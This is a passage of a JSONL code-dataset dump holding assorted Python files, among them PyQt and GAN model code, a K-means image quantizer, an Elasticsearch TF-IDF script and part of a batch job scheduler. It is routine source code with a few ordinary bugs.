phone:\n request.phone = phone\n # raise error in case of validation problem\n try:\n request.save()\n except (db.ValidationError):\n raise SignUpRequestException\n\n # send e-Mail\n email_vars = {\n 'name': name,\n 'email': email,\n 'phone': phone\n }\n send_trans_email('signup_request', ['{0} <{1}>'.format('InGage Admin', email), ], email_vars)\n\n return request\n\n def __repr__(self):\n return ''.format(self.name, self.email)\n","sub_path":"api/ig_api/misc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"299288587","text":"import sys\nfrom PyQt4 import QtGui\n\nclass MyForm(QtGui.QWidget):\n\n\tdef __init__(self):\n\t\tsuper(MyForm, self).__init__()\n\n\t\tlbl = QtGui.QLabel('My First UI Element!', self)\n\n\n\n\napp = QtGui.QApplication(sys.argv)\nmainWindow = MyForm()\nstatus = app.exec_()\nsys.exit(status)","sub_path":"PythonResources/CBTNuggets/13-PyQt/PyQt1.py","file_name":"PyQt1.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"333866990","text":"__author__ = 'Willem Elbers (MPI-TLA) \\\n Claudio Cacciari (Cineca) '\n\nimport ConfigParser\n\nclass ConfigLoader():\n\n def __init__(self, config_file):\n\n self.config_file = config_file\n self.config = ConfigParser.ConfigParser()\n self.config.read(self.config_file)\n\n def SectionMap(self, section):\n\n dict1 = {}\n options = self.config.options(section)\n for option in options:\n try:\n dict1[option] = self.config.get(section, option)\n except:\n dict1[option] = None\n return dict1\n","sub_path":"db/scripts/ConfigLoader.py","file_name":"ConfigLoader.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"392921640","text":"# -*- coding: utf-8 -*-\nfrom model.group import Group\nfrom random import randrange\nimport random\n\n\ndef test_modify_group_name(app):\n if app.group.count_groups() == 0:\n app.group.create(Group(name=\"for_modification\"))\n old_groups = app.group.get_group_list()\n group = Group(name=\"test_for_modification???\")\n index = randrange(len(old_groups))\n group.id = old_groups[index].id\n app.group.modify_some_group(group, index)\n assert len(old_groups) == app.group.count_groups()\n new_groups = app.group.get_group_list()\n old_groups[index] = group\n assert sorted(new_groups, key=Group.id_or_max) == sorted(old_groups, key=Group.id_or_max)\n\n\ndef test_modify_group_db(app, db, check_ui):\n if len(db.get_group_list()) == 0:\n app.group.create(Group(name=\"for_modification\", header=\"for_modification\", footer=\"for_modification\"))\n old_groups = db.get_group_list()\n modify_data = Group(name=\"mmm\", header=\"mmm\", footer=\"mmm\")\n group = random.choice(old_groups)\n app.group.modify_some_group_by_id(modify_data, group.id)\n modify_data.id = group.id\n new_groups = db.get_group_list()\n old_groups.remove(group)\n old_groups.append(modify_data)\n assert sorted(new_groups, key=Group.id_or_max) == sorted(old_groups, key=Group.id_or_max)\n #assert new_groups == old_groups\n if check_ui:\n assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","sub_path":"test/test_modify_group.py","file_name":"test_modify_group.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"625143673","text":"import math\r\n\r\nimport numpy as np\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom spectral import SpectralNorm\r\nfrom torch.autograd import Variable\r\n\r\n\r\nclass Self_Attn(nn.Module):\r\n \"\"\" Self attention Layer\"\"\"\r\n\r\n def __init__(self, in_dim, activation):\r\n super(Self_Attn, self).__init__()\r\n self.chanel_in = in_dim\r\n self.activation = activation\r\n\r\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\r\n self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8, kernel_size=1)\r\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\r\n self.gamma = nn.Parameter(torch.zeros(1))\r\n\r\n self.softmax = nn.Softmax(dim=-1)\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n inputs :\r\n x : input feature maps( B X C X W X H)\r\n returns :\r\n out : self attention value + input feature\r\n attention: B X N X N (N is Width*Height)\r\n \"\"\"\r\n m_batchsize, C, width, height = x.size()\r\n proj_query = self.query_conv(x).view(m_batchsize, -1, width *\r\n height).permute(0, 2, 1) # B X CX(N)\r\n proj_key = self.key_conv(x).view(m_batchsize, -1, width*height) # B X C x (*W*H)\r\n energy = torch.bmm(proj_query, proj_key) # transpose check\r\n attention = self.softmax(energy) # BX (N) X (N)\r\n proj_value = self.value_conv(x).view(m_batchsize, -1, width*height) # B X C X N\r\n\r\n out = torch.bmm(proj_value, attention.permute(0, 2, 1))\r\n out = out.view(m_batchsize, C, width, height)\r\n\r\n out = self.gamma*out + x\r\n return out, attention\r\n\r\n\r\nclass Generator(nn.Module):\r\n \"\"\"Generator.\"\"\"\r\n\r\n def __init__(self, batch_size, image_size=64, z_dim=100, extra_inputs_gen=0, conv_dim=64):\r\n super(Generator, self).__init__()\r\n self.imsize = image_size\r\n layer1 = []\r\n layer2 = []\r\n layer3 = []\r\n last = []\r\n\r\n repeat_num = int(np.log2(self.imsize)) - 3\r\n mult = 2 ** repeat_num # 8\r\n layer1.append(SpectralNorm(nn.ConvTranspose2d(z_dim+extra_inputs_gen, conv_dim * mult, 4)))\r\n layer1.append(nn.BatchNorm2d(conv_dim * mult))\r\n layer1.append(nn.ReLU())\r\n\r\n curr_dim = conv_dim * mult\r\n\r\n layer2.append(SpectralNorm(nn.ConvTranspose2d(curr_dim, int(curr_dim / 2), 4, 2, 1)))\r\n layer2.append(nn.BatchNorm2d(int(curr_dim / 2)))\r\n layer2.append(nn.ReLU())\r\n\r\n curr_dim = int(curr_dim / 2)\r\n\r\n layer3.append(SpectralNorm(nn.ConvTranspose2d(curr_dim, int(curr_dim / 2), 4, 2, 1)))\r\n layer3.append(nn.BatchNorm2d(int(curr_dim / 2)))\r\n layer3.append(nn.ReLU())\r\n\r\n if self.imsize == 64:\r\n layer4 = []\r\n curr_dim = int(curr_dim / 2)\r\n layer4.append(SpectralNorm(nn.ConvTranspose2d(curr_dim, int(curr_dim / 2), 4, 2, 1)))\r\n layer4.append(nn.BatchNorm2d(int(curr_dim / 2)))\r\n layer4.append(nn.ReLU())\r\n self.l4 = nn.Sequential(*layer4)\r\n curr_dim = int(curr_dim / 2)\r\n\r\n self.l1 = nn.Sequential(*layer1)\r\n self.l2 = nn.Sequential(*layer2)\r\n self.l3 = nn.Sequential(*layer3)\r\n\r\n last.append(nn.ConvTranspose2d(curr_dim, 3, 4, 2, 1))\r\n last.append(nn.Tanh())\r\n self.last = nn.Sequential(*last)\r\n\r\n self.attn1 = Self_Attn(128, 'relu')\r\n self.attn2 = Self_Attn(64, 'relu')\r\n\r\n # self.encoder = _Encoder(image_size, z_dim, conv_dim, nc=3)\r\n self.encoder = _EncoderSA(batch_size=batch_size, image_size=image_size,\r\n conv_dim=conv_dim, nz=z_dim)\r\n\r\n def forward(self, z):\r\n z = z.view(z.size(0), z.size(1), 1, 1)\r\n out = self.l1(z)\r\n out = self.l2(out)\r\n out = self.l3(out)\r\n out, p1 = self.attn1(out)\r\n out = self.l4(out)\r\n out, p2 = self.attn2(out)\r\n out = self.last(out)\r\n\r\n return out, p1, p2\r\n\r\n\r\nclass Discriminator(nn.Module):\r\n \"\"\"Discriminator, Auxiliary Classifier.\"\"\"\r\n\r\n def __init__(self, batch_size=64, image_size=64, conv_dim=64):\r\n super(Discriminator, self).__init__()\r\n self.imsize = image_size\r\n layer1 = []\r\n layer2 = []\r\n layer3 = []\r\n last = []\r\n\r\n layer1.append(SpectralNorm(nn.Conv2d(3, conv_dim, 4, 2, 1)))\r\n layer1.append(nn.LeakyReLU(0.1))\r\n\r\n curr_dim = conv_dim\r\n\r\n layer2.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer2.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n layer3.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer3.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n if self.imsize == 64:\r\n layer4 = []\r\n layer4.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer4.append(nn.LeakyReLU(0.1))\r\n self.l4 = nn.Sequential(*layer4)\r\n curr_dim = curr_dim*2\r\n self.l1 = nn.Sequential(*layer1)\r\n self.l2 = nn.Sequential(*layer2)\r\n self.l3 = nn.Sequential(*layer3)\r\n\r\n last.append(nn.Conv2d(curr_dim, 1, 4))\r\n self.last = nn.Sequential(*last)\r\n\r\n self.attn1 = Self_Attn(256, 'relu')\r\n self.attn2 = Self_Attn(512, 'relu')\r\n\r\n def forward(self, x):\r\n out = self.l1(x)\r\n out = self.l2(out)\r\n out = self.l3(out)\r\n out, p1 = self.attn1(out)\r\n out = self.l4(out)\r\n out, p2 = self.attn2(out)\r\n out = self.last(out)\r\n\r\n return out.squeeze(), p1, p2\r\n\r\n\r\nclass _Sampler(nn.Module):\r\n def __init__(self):\r\n super(_Sampler, self).__init__()\r\n\r\n def forward(self, input):\r\n mu = input[0]\r\n logvar = input[1]\r\n\r\n std = logvar.mul(0.5).exp_() # calculate the STDEV\r\n if True: # opt.cuda:\r\n eps = torch.cuda.FloatTensor(std.size()).normal_() # random normalized noise\r\n else:\r\n eps = torch.FloatTensor(std.size()).normal_() # random normalized noise\r\n eps = Variable(eps)\r\n return eps.mul(std).add_(mu)\r\n\r\n\r\nclass _Encoder(nn.Module):\r\n def __init__(self, imageSize, nz, conv_dim=64, nc=3):\r\n super(_Encoder, self).__init__()\r\n\r\n n = math.log2(imageSize)\r\n\r\n assert n == round(n), 'imageSize must be a power of 2'\r\n assert n >= 3, 'imageSize must be at least 8'\r\n n = int(n)\r\n self.sampler = _Sampler()\r\n self.nz = nz\r\n ngf = conv_dim\r\n self.conv1 = nn.Conv2d(ngf * 2**(n-3), nz, 4)\r\n self.conv2 = nn.Conv2d(ngf * 2**(n-3), nz, 4)\r\n print(\"ngf\", ngf)\r\n print(\"nz\", nz)\r\n print(\"n\", n)\r\n self.encoder = nn.Sequential()\r\n # input is (nc) x 64 x 64\r\n self.encoder.add_module('input-conv', nn.Conv2d(nc, ngf, 4, 2, 1, bias=False))\r\n self.encoder.add_module('input-relu', nn.LeakyReLU(0.1))\r\n for i in range(n-3):\r\n # state size. (ngf) x 32 x 32\r\n self.encoder.add_module('pyramid{0}-{1}conv'.format(ngf*2**i, ngf * 2**(i+1)),\r\n nn.Conv2d(ngf*2**(i), ngf * 2**(i+1), 4, 2, 1, bias=False))\r\n self.encoder.add_module('pyramid{0}batchnorm'.format(\r\n ngf * 2**(i+1)), nn.BatchNorm2d(ngf * 2**(i+1)))\r\n self.encoder.add_module('pyramid{0}relu'.format(\r\n ngf * 2**(i+1)), nn.LeakyReLU(0.1))\r\n\r\n # state size. (ngf*8) x 4 x 4\r\n\r\n def forward(self, input):\r\n output = self.encoder(input)\r\n return [self.conv1(output).view(-1, self.nz), self.conv2(output).view(-1, self.nz)]\r\n\r\n\r\nclass _EncoderSA(nn.Module):\r\n \"\"\"Discriminator, Auxiliary Classifier.\"\"\"\r\n\r\n def __init__(self, batch_size=64, image_size=64, conv_dim=64, nz=100):\r\n super(_EncoderSA, self).__init__()\r\n self.imsize = image_size\r\n self.sampler = _Sampler()\r\n layer1 = []\r\n layer2 = []\r\n layer3 = []\r\n last1 = []\r\n last2 = []\r\n self.nz = nz\r\n layer1.append(SpectralNorm(nn.Conv2d(3, conv_dim, 4, 2, 1)))\r\n layer1.append(nn.LeakyReLU(0.1))\r\n\r\n curr_dim = conv_dim\r\n\r\n layer2.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer2.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n layer3.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer3.append(nn.LeakyReLU(0.1))\r\n curr_dim = curr_dim * 2\r\n\r\n if self.imsize == 64:\r\n layer4 = []\r\n layer4.append(SpectralNorm(nn.Conv2d(curr_dim, curr_dim * 2, 4, 2, 1)))\r\n layer4.append(nn.LeakyReLU(0.1))\r\n self.l4 = nn.Sequential(*layer4)\r\n curr_dim = curr_dim*2\r\n self.l1 = nn.Sequential(*layer1)\r\n self.l2 = nn.Sequential(*layer2)\r\n self.l3 = nn.Sequential(*layer3)\r\n\r\n last1.append(nn.Conv2d(curr_dim, nz, 4))\r\n self.last1 = nn.Sequential(*last1)\r\n last2.append(nn.Conv2d(curr_dim, nz, 4))\r\n self.last2 = nn.Sequential(*last2)\r\n\r\n self.attn1 = Self_Attn(256, 'relu')\r\n self.attn2 = Self_Attn(512, 'relu')\r\n\r\n def forward(self, x):\r\n out = self.l1(x)\r\n out = self.l2(out)\r\n out = self.l3(out)\r\n out, p1 = self.attn1(out)\r\n out = self.l4(out)\r\n out, p2 = self.attn2(out)\r\n out1 = self.last1(out)\r\n out2 = self.last2(out)\r\n # mu and var\r\n return out1.view(-1, self.nz), out2.view(-1, self.nz) # p1, p2\r\n","sub_path":"sagan_models.py","file_name":"sagan_models.py","file_ext":"py","file_size_in_byte":9689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"645785974","text":"# factional function\nprint('factional function')\n\n\ndef straight_forward_factional(n): # classical implementation\n result = n\n for i in range(n):\n result *= i\n return result\n\n\ndef recursive_factional(n): # recursive implementation\n if n == 1:\n return 1 # break condition\n else:\n return n * recursive_factional(n - 1)\n\n\n# power function\nprint('power function')\n\n\ndef straight_forward_power(x, n): # classical implementation\n result = 1\n for i in range(n):\n result *= x\n return result\n\n\ndef recursive_power(x, n):\n if n == 0:\n return 1\n else:\n return x * recursive_power(x, n - 1)\n\n\n# binary search\nprint('binary search')\n\n\ndef search(sequence, number, lower=0, upper=None):\n if upper is None:\n upper = len(sequence) - 1\n\n if lower == upper:\n assert number == sequence[upper]\n return upper\n else:\n middle = (lower + upper) // 2\n if number > sequence[middle]:\n return search(sequence, number, middle + 1, upper)\n else:\n return search(sequence, number, lower, middle)\n\n\nseq = [34, 67, 123, 4, 100, 95]\nseq.sort()\nprint(search(seq, 123))\n# 5\n","sub_path":"beginning-python/06/06-07-recursive.py","file_name":"06-07-recursive.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"332373421","text":"from PIL import Image\n\nfrom kmeans import *\n\ndef saveImage(image, filename):\n image.save(filename)\n print(\"saved image: \"+filename)\n\ndef createEmptyImage(width, height):\n return Image.new('RGB', (width, height))\n\ndef paintPixel(image, x, y, color):\n #print(\"Painting pixel \"+str(x)+\", \"+str(y)+\" c\"+str(color))\n image.putpixel((x, y), color)\n\ndef readImage(filename):\n return Image.open(filename)\n\ndef getPixel(image, x, y):\n return image.getpixel((x, y))\n\ndef getImageSize(image):\n return image.size\n\ndef getLowestScoreing(array):\n l_score = None\n l_dict = None\n l_cent = None\n l_iter = None\n\n for item in array:\n if l_score == None:\n l_score = item[1]\n l_dict = item[0]\n l_cent = item[2]\n l_iter = item[3]\n else:\n if item[1] < l_score:\n l_score = item[1]\n l_dict = item[0]\n l_cent = item[2]\n l_iter = item[3]\n return (l_dict, l_cent, l_iter)\n\ndef createImageFromBest(filename, image, k, kmeans):\n size = getImageSize(image)\n best = getLowestScoreing(kmeans[2])\n Colors = best[1]\n\n print(\"Creating new Image! Using iteration \"+str(best[2]))\n nim = createEmptyImage(size[0], size[1])\n for x in range(size[0]):\n for y in range(size[1]):\n p = getPixel(image, x, y)\n clr = Colors[getClosestCentroidIDAndDistance([p[0], p[1], p[2]], Colors)[0]]\n clr = (int(clr[0]), int(clr[1]), int(clr[2]))\n paintPixel(nim, x, y, clr) # color: get color of closest centeroid\n filename = \"KM_k\"+str(k)+\"_i\"+str(best[2])+\"_\"+filename+\".png\"\n print(\"Writing to image! \"+filename)\n saveImage(nim, filename)\n\ndef createImagesForAll(filename, image, k, kmeans):\n timeline = kmeans[2]\n size = getImageSize(image)\n\n for line in timeline:\n # print timeline\n clusters = line[0]\n Colors = line[2]\n iter = line[3]\n\n print(\"Creating new Image! Using iteration \"+str(iter))\n nim = createEmptyImage(size[0], size[1])\n for x in range(size[0]):\n for y in range(size[1]):\n p = getPixel(image, x, y)\n clr = Colors[getClosestCentroidIDAndDistance([p[0], p[1], p[2]], Colors)[0]]\n clr = (int(clr[0]), int(clr[1]), int(clr[2]))\n paintPixel(nim, x, y, clr) # color: get color of closest centeroid\n t_filename = \"KM_k\"+str(k)+\"_i\"+str(iter)+\"_\"+filename+\".png\"\n print(\"Writing to image! \"+t_filename)\n saveImage(nim, t_filename)\n\n\n\ndef VisualizeKM(filename, k=3, iter=-1, write_all=False):\n img = readImage(filename)\n\n size = getImageSize(img)\n # create dataset\n\n print(\"Reading image!\")\n data_set = []\n for x in range(size[0]):\n for y in range(size[1]):\n pd = getPixel(img, x, y)\n data_set.append([pd[0], pd[1], pd[2]])\n\n print(\"Running K-Means algorithm!\")\n res = KMeans(data_set, k, iter)\n if write_all:\n createImagesForAll(filename, img, k, res)\n else:\n createImageFromBest(filename, img, k, res)\n\n\ndef svKM():\n filename = input(\"Name of file to compress: \")\n k = int(input(\"How large k?: \"))\n wai = input(\"Write image for all iterations?(Yes/No) (default is No) \").lower()\n if wai == \"yes\" or wai == \"y\" or wai == \"ye\":\n VisualizeKM(filename, k, write_all=True)\n else:\n VisualizeKM(filename, k)\n #print(\"Image created with name: KM_k\"+str(k)+\"_\"+filename+\".png\")\n\nsvKM()\n","sub_path":"visualKM.py","file_name":"visualKM.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"620594991","text":"from datetime import datetime\nimport time\nimport json\nimport sys\nimport traceback\nimport os\nimport gensim\nfrom gensim import corpora\nfrom gensim.models import TfidfModel\nfrom common import prs\nfrom common import cmm\nimport numpy as np \nfrom operator import itemgetter\nfrom elasticsearch import Elasticsearch\nimport topic_analysis.esAccount as esAcc \n\nif os.name == \"nt\":# 윈도우 운영체제\n from eunjeon import Mecab\nelse:# 현재 리눅스 서버 및 맥은 konlpy으로 미캡 모듈 import\n from konlpy.tag import Mecab\n\nes = Elasticsearch(\n [esAcc.host],\n http_auth=(esAcc.id, esAcc.password),\n scheme=\"https\",\n port= esAcc.port,\n verify_certs=False\n)\nindex = esAcc.index\n \n\nDIR_HomeGraph = \"./tfidfHomeGraphdata.json\"\nDIR_EntireTfidf = \"./tfidfs/tfidfTotaldata\" \n\n\ndef makeCorpus (resp):\n corpus = []\n for oneDoc in resp['hits']['hits']:\n #print(len(oneDoc[\"_source\"][\"hash_key\"]))\n #print(oneDoc[\"_source\"][\"hash_key\"])\n if \"file_extracted_content\" in oneDoc[\"_source\"].keys():\n corpus.append(\n {\n \"hash_key\" : oneDoc[\"_source\"][\"hash_key\"],\n \"post_title\" : oneDoc[\"_source\"][\"post_title\"],\n \"content\" : oneDoc[\"_source\"][\"file_extracted_content\"]\n }\n )\n elif \"hash_key\" in oneDoc[\"_source\"].keys():\n corpus.append(\n {\n \"hash_key\" : oneDoc[\"_source\"][\"hash_key\"],\n \"post_title\" : oneDoc[\"_source\"][\"post_title\"],\n \"content\" : oneDoc[\"_source\"][\"post_body\"]\n }\n )\n return corpus\n\ndef filterEmptyDoc (corpus):\n hash_key = []\n titles = []\n contents = []\n\n for idx, doc in enumerate(corpus):\n if doc[\"content\"] != \"\":\n hash_key.append(doc[\"hash_key\"])\n titles.append(doc[\"post_title\"])\n contents.append(doc[\"content\"])\n \n return {\"hash_key\" : hash_key, \"titles\" : titles, \"contents\" : contents}\n\ndef dataPrePrcs(corpus):\n cnt = 0\n hashList = corpus[\"hash_key\"]\n titles = corpus[\"titles\"]\n contents = corpus[\"contents\"]\n import re\n rex1 = re.compile('[^가-힣0-9*.?,!]')#한글 숫자 자주 쓰는 문자만 취급\n \n tagger = Mecab()\n for i,c in enumerate(contents):\n try:\n c = rex1.sub(\" \",c)\n except Exception:\n # print(\"에러 : title : \", titles[i], \", content : \", c)# 문서 내용이 None\n cnt = cnt+1\n # print(cnt)\n \n num_co = 0\n tokenized_doc = []\n failIdxList = []\n \n for i, c in enumerate(contents):\n num_co = num_co + 1\n try:\n t = tagger.nouns(c)\n tokenized_doc.append(t)\n except:\n failIdxList.append(i)\n for idx in reversed(failIdxList):\n hashList.pop(idx)\n titles.pop(idx)\n\n\n # 한글자 단어들 지우기!\n num_doc = len(tokenized_doc)\n for i in range(num_doc):\n tokenized_doc[i] = [word for word in tokenized_doc[i] if len(word) > 1]\n \n return hashList, titles, tokenized_doc, contents\n\n\ndef runAnalysis(resp):\n # Create corpus object\n print(\"Create corpus\")\n corpus = makeCorpus(resp)\n \n # Take only non-empty data\n print(\"Filter Empty Data\")\n corpus = filterEmptyDoc(corpus) \n\n # Tokenize documents\n print(\"Tokenize Data\")\n (hash_key, titles, tokenized_doc, contents) = dataPrePrcs(corpus)\n\n # Dictionarize documents\n print(\"Dictionarize Data\")\n dictionarizedDoc = corpora.Dictionary(tokenized_doc)\n\n # Tfidif Modeling\n print(\"Modeling Data\")\n corpus = corpus = [dictionarizedDoc.doc2bow(line) for line in tokenized_doc]\n tfidfModel = TfidfModel(corpus)\n\n sortedWords = []\n # Sort by tfidf value\n for id, word_list in enumerate(tfidfModel[corpus]):\n word_list = sorted(word_list, key=itemgetter(1), reverse = True) \n sortedWords.append((id, word_list))\n print(\"Sort Data: \")\n\n # Create Object of tfidf\n print(\"Create Result Object\")\n result = []\n for i, wordValuePair in sortedWords:\n wordValuePair = sortedWords[i]\n tfidfWord = []\n for idx, (wordId, tfidfValue) in enumerate(wordValuePair[1]):\n tfidfWord.append((dictionarizedDoc[wordId], tfidfValue))\n result.append({\"hash_key\": hash_key[i], \"docTitle\": titles[i], \"tfidf\": tfidfWord})\n\n return result\n\ndef createJson(result, count):\n # Save into Json format\n with open(\"{dir}{num}.json\".format(dir=DIR_EntireTfidf, num=count), 'w', -1, \"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False)\n\n# 2021.01.07 YHJ\ndef getAllTfidfTable():\n count = 0\n # Get first 100 data\n resp = es.search( \n index = ESindex, \n body = { \"size\":100, \"query\": { \"match_all\" : {} } }, \n scroll='10m'\n )\n\n # Save Scroll id for next search\n scrollId = resp[\"_scroll_id\"]\n\n analysisResult = runAnalysis(resp)\n createJson(analysisResult, count)\n\n print(\"Done with the first set\")\n cmm.showTime()\n \n while len(resp['hits']['hits']):\n count = count + 1\n print(\"start set #{}\".format(count))\n resp = es.scroll( \n scroll_id = scrollId, \n scroll='10m'\n ) \n analysisResult = runAnalysis(resp)\n createJson(analysisResult, count)\n print(\"done with #{}\".format(count))\n cmm.showTime()\n\nif __name__ == \"__main__\":\n getAllTfidfTable() \n","sub_path":"tfidf_all.py","file_name":"tfidf_all.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"200905719","text":"import os\nimport json\nimport asyncio\nimport aiohttp\nfrom aiohttp import web\nimport logging\nimport google.oauth2.service_account\nimport sortedcontainers\n\nfrom hailtop.config import get_deploy_config\nfrom hailtop.utils import AsyncWorkerPool, request_retry_transient_errors\n\nfrom ..google_compute import GServices\nfrom ..utils import parse_cpu_in_mcpu\n\nfrom .instance_pool import InstancePool\n\nlog = logging.getLogger('driver')\n\nBATCH_JOB_DEFAULT_CPU = os.environ.get('HAIL_BATCH_JOB_DEFAULT_CPU', '1')\nBATCH_JOB_DEFAULT_MEMORY = os.environ.get('HAIL_BATCH_JOB_DEFAULT_MEMORY', '3.75G')\n\n\nclass Pod:\n @staticmethod\n def from_record(driver, record):\n batch_id = record['batch_id']\n job_spec = json.loads(record['job_spec'])\n userdata = json.loads(record['userdata'])\n status = json.loads(record['status']) if record['status'] else None\n\n inst = driver.inst_pool.token_inst.get(record['instance'])\n\n pod = Pod(\n driver=driver,\n name=record['name'],\n batch_id=batch_id,\n job_spec=job_spec,\n userdata=userdata,\n output_directory=record['output_directory'],\n cores_mcpu=record['cores_mcpu'],\n status=status,\n instance=inst)\n\n if inst:\n inst.schedule(pod)\n\n return pod\n\n @staticmethod\n async def create_pod(driver, name, batch_id, job_spec, userdata, output_directory):\n cpu = None\n resources = job_spec.get('resources')\n if resources:\n cpu = resources.get('cpu')\n if not cpu:\n cpu = BATCH_JOB_DEFAULT_CPU\n cores_mcpu = parse_cpu_in_mcpu(cpu)\n\n await driver.db.pods.new_record(name=name, batch_id=batch_id, job_spec=json.dumps(job_spec),\n userdata=json.dumps(userdata), output_directory=output_directory,\n cores_mcpu=cores_mcpu, instance=None)\n\n return Pod(driver, name, batch_id, job_spec, userdata, output_directory, cores_mcpu)\n\n def __init__(self, driver, name, batch_id, job_spec, userdata, output_directory, cores_mcpu, instance=None, on_ready=False, status=None):\n self.driver = driver\n self.name = name\n self.batch_id = batch_id\n self.job_spec = job_spec\n self.userdata = userdata\n self.output_directory = output_directory\n self.cores_mcpu = cores_mcpu\n self.instance = instance\n self.on_ready = on_ready\n self._status = status\n self.deleted = False\n\n loop = asyncio.get_event_loop()\n self.lock = asyncio.Lock(loop=loop)\n\n async def config(self):\n job_spec = dict(self.job_spec)\n\n # copy secrets\n if 'secrets' in job_spec:\n job_spec['secrets'] = [dict(secret) for secret in job_spec['secrets']]\n\n # update resources with defaults\n if 'resources' not in job_spec:\n job_spec['resources'] = {}\n resources = job_spec['resources']\n if 'cpu' not in resources:\n resources['cpu'] = BATCH_JOB_DEFAULT_CPU\n if 'memory' not in resources:\n resources['memory'] = BATCH_JOB_DEFAULT_MEMORY\n\n # add user's gsa-key\n secrets = job_spec.get('secrets', [])\n secrets = list(secrets)\n secrets.append({\n 'namespace': 'batch-pods', # FIXME unused\n 'name': self.userdata['gsa_key_secret_name'],\n 'mount_path': '/gsa-key',\n 'mount_in_copy': True\n })\n job_spec['secrets'] = secrets\n\n secret_futures = []\n for secret in secrets:\n # FIXME need access control to verify user is allowed to access secret\n secret_futures.append(self.driver.k8s.read_secret(secret['name']))\n k8s_secrets = await asyncio.gather(*secret_futures)\n\n for secret, k8s_secret in zip(secrets, k8s_secrets):\n if k8s_secret:\n secret['data'] = k8s_secret.data\n\n return {\n 'name': self.name,\n 'batch_id': self.batch_id,\n 'user': self.userdata['username'],\n 'job_spec': job_spec,\n 'output_directory': self.output_directory\n }\n\n async def mark_complete(self, status):\n self._status = status\n await self.driver.db.pods.update_record(self.name, status=json.dumps(status))\n\n def mark_deleted(self):\n assert not self.deleted\n self.deleted = True\n self.remove_from_ready()\n\n async def unschedule(self):\n if not self.instance:\n return\n\n log.info(f'unscheduling {self.name} with {self.cores_mcpu / 1000} cores from {self.instance}')\n\n self.instance.unschedule(self)\n self.instance = None\n await self.driver.db.pods.update_record(self.name, instance=None)\n\n async def schedule(self, inst):\n async with self.lock:\n assert not self.instance\n\n self.remove_from_ready()\n\n if self.deleted:\n log.info(f'not scheduling {self.name} on {inst.name}; pod already deleted')\n return False\n\n if self._status:\n log.info(f'not scheduling {self.name} on {inst.name}; pod already complete')\n return False\n\n if not inst.active:\n log.info(f'not scheduling {self.name} on {inst.name}; instance not active')\n asyncio.ensure_future(self.put_on_ready())\n return False\n\n if not inst.healthy:\n log.info(f'not scheduling {self.name} on {inst.name}; instance not healthy')\n asyncio.ensure_future(self.put_on_ready())\n return False\n\n log.info(f'scheduling {self.name} with {self.cores_mcpu / 1000} cores on {inst}')\n\n inst.schedule(self)\n\n self.instance = inst\n\n # FIXME: is there a way to eliminate this blocking the scheduler?\n await self.driver.db.pods.update_record(self.name, instance=inst.token)\n return True\n\n async def put_on_ready(self):\n # FIXME: does this need a lock?\n assert not self.on_ready\n\n if self._status:\n log.info(f'{self.name} already complete, ignoring put on ready')\n return\n\n if self.deleted:\n log.info(f'{self.name} already deleted, ignoring put on ready')\n return\n\n await self.unschedule()\n\n await self.driver.ready_queue.put(self)\n self.on_ready = True\n self.driver.ready_cores_mcpu += self.cores_mcpu\n self.driver.changed.set()\n\n def remove_from_ready(self):\n if self.on_ready:\n self.on_ready = False\n self.driver.ready_cores_mcpu -= self.cores_mcpu\n\n async def _request(self, method, url, **kwargs):\n try:\n async with aiohttp.ClientSession(\n raise_for_status=True, timeout=aiohttp.ClientTimeout(total=60)) as session:\n resp = await request_retry_transient_errors(session, method, url, **kwargs)\n if self.instance:\n self.instance.mark_as_healthy()\n return resp\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception:\n if self.instance:\n self.instance.mark_as_unhealthy()\n raise\n\n async def create(self):\n async with self.lock:\n assert not self.on_ready\n\n config = await self.config()\n\n if self.deleted:\n log.info(f'pod already deleted {self.name}')\n return\n\n if not self.instance:\n log.info(f'instance was deactivated before {self.name} could be created; rescheduling')\n asyncio.ensure_future(self.put_on_ready())\n return\n\n inst = self.instance\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/create'\n try:\n await self._request('POST', url, json=config)\n log.info(f'created {self.name} on inst {inst}')\n except Exception:\n log.exception(f'failed to create {self.name} on inst {inst}, putting back on ready queue')\n asyncio.ensure_future(self.put_on_ready())\n\n async def delete(self):\n assert self.deleted\n\n async with 